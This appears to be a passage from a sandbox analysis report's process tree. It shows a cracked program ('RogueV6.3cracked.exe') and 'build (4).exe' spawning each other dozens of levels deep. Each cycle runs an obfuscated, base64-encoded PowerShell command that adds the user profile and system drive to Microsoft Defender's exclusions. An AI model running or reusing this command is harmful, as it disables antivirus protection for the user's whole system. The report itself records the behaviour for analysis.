        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        83⤵
        
        PID:3480
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        83⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        83⤵
        
        PID:3644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        84⤵
        System Location Discovery: System Language Discovery
        
        PID:3956
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        84⤵
        
        PID:3660
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        84⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        85⤵
        System Location Discovery: System Language Discovery
        
        PID:3628
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        85⤵
        System Location Discovery: System Language Discovery
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        85⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        86⤵
        
        PID:3252
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        86⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        86⤵
        System Location Discovery: System Language Discovery
        
        PID:2984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        87⤵
        System Location Discovery: System Language Discovery
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        87⤵
        
        PID:3912
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        87⤵
        
        PID:4048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        88⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        88⤵
        System Location Discovery: System Language Discovery
        
        PID:3248
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        88⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        89⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        89⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        89⤵
        
        PID:3920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        90⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        90⤵
        
        PID:3804
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        90⤵
        
        PID:3416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        91⤵
        System Location Discovery: System Language Discovery
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        91⤵
        
        PID:3952
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        91⤵
        System Location Discovery: System Language Discovery
        
        PID:4024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        92⤵
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        92⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        92⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        93⤵
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        93⤵
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        93⤵
        
        PID:1468
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        94⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        94⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        94⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        95⤵
        
        PID:3736
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        95⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        95⤵
        
        PID:3416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        96⤵
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        96⤵
        
        PID:3468
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        96⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        97⤵
        System Location Discovery: System Language Discovery
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        97⤵
        System Location Discovery: System Language Discovery
        
        PID:3484
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        97⤵
        
        PID:3856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        98⤵
        System Location Discovery: System Language Discovery
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        98⤵
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        98⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        99⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        99⤵
        System Location Discovery: System Language Discovery
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        99⤵
        System Location Discovery: System Language Discovery
        
        PID:3872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        100⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        100⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        100⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        101⤵
        System Location Discovery: System Language Discovery
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        101⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        101⤵
        
        PID:3664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        102⤵
        System Location Discovery: System Language Discovery
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        102⤵
        
        PID:3780
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        102⤵
        
        PID:3264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        103⤵
        
        PID:4000
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        103⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        103⤵
        System Location Discovery: System Language Discovery
        
        PID:920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        104⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        104⤵
        
        PID:3776
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        104⤵
        
        PID:3120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        105⤵
        System Location Discovery: System Language Discovery
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        105⤵
        System Location Discovery: System Language Discovery
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        105⤵
        
        PID:3252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        106⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        106⤵
        
        PID:3512
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        106⤵
        
        PID:4032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        107⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        107⤵
        
        PID:3304
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        107⤵
        System Location Discovery: System Language Discovery
        
        PID:920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        108⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        108⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        108⤵
        System Location Discovery: System Language Discovery
        
        PID:916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        109⤵
        
        PID:3516
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        109⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
